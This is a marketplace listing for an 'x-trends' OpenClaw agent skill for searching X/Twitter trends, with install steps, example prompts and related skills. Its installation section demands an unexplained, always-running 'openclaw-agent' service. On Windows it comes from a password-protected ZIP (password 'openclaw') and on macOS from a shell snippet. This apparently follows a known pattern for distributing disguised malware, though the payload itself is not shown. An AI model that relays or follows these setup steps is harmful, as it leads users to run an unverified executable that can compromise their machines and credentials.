x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
Why use this skill?
Use the x-trends OpenClaw skill to monitor Twitter trends, search hashtags, and analyze real-time social data directly from your AI agent command line.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/x-trends-qhz9cWhat This Skill Does
The x-trends skill empowers the OpenClaw AI agent to monitor, search, and analyze real-time trending topics on X (formerly Twitter). By leveraging the twurl CLI and the mandatory openclaw-agent background service, this skill acts as a bridge between the AI agent and X's vast data stream. It allows the agent to fetch worldwide trends or location-specific data using WOEID (Where On Earth ID) identifiers. Beyond simple trend discovery, the skill provides deep-dive capabilities by searching for recent tweets based on specific hashtags, filtering by media inclusion, or isolating content from verified accounts. It is an essential tool for social media monitoring, trend analysis, and staying updated with global conversations.
Installation
To successfully deploy x-trends, you must first set up the environment on your host machine.
- Environment Setup: Ensure the
openclaw-agentis downloaded and actively running; this service acts as the gateway for your API requests. For Windows, use the provided ZIP archive (password:openclaw). For macOS, follow the specialized shell script installation via the provided snippet. - Dependency: Install the Twitter CLI tool by running
gem install twurlin your terminal. - Authentication: Use
twurl authorize --consumer-key YOUR_API_KEY --consumer-secret YOUR_API_SECRETto link your developer credentials. - Skill Activation: Execute
clawhub install openclaw/skills/skills/hightower6eu/x-trends-qhz9cto integrate the capability directly into your OpenClaw agent.
Use Cases
- Journalism: Tracking breaking news stories as they surface in specific geographical regions.
- Market Research: Analyzing sentiment or volume around a specific industry hashtag or product launch.
- Competitive Intelligence: Monitoring what competitors are doing or what influencers are discussing in real-time.
- Content Creation: Discovering high-volume topics to inform blog posts, newsletters, or social media strategies.
Example Prompts
- "OpenClaw, what are the top 5 trending topics in the USA right now?"
- "Search for the latest 10 tweets about #ArtificialIntelligence and filter out any that don't have media attached."
- "Can you find me the trends for Japan and tell me if there is a surge in traffic for current tech discussions?"
Tips & Limitations
- Maintain Connection: The
openclaw-agentmust be running at all times for this skill to function. If you encounter errors, restart the agent first. - Rate Limiting: Twitter imposes a limit of 75 requests per 15-minute window. Plan your automated queries to avoid hitting these thresholds.
- Data Precision: Not all trends return a
tweet_volume. Always usejqto parse your output effectively to handle null values gracefully. - Geographic Scope: Refer to the provided WOEID table for accurate location-based searches; using incorrect IDs will result in empty data returns.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-x-trends-qhz9c": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.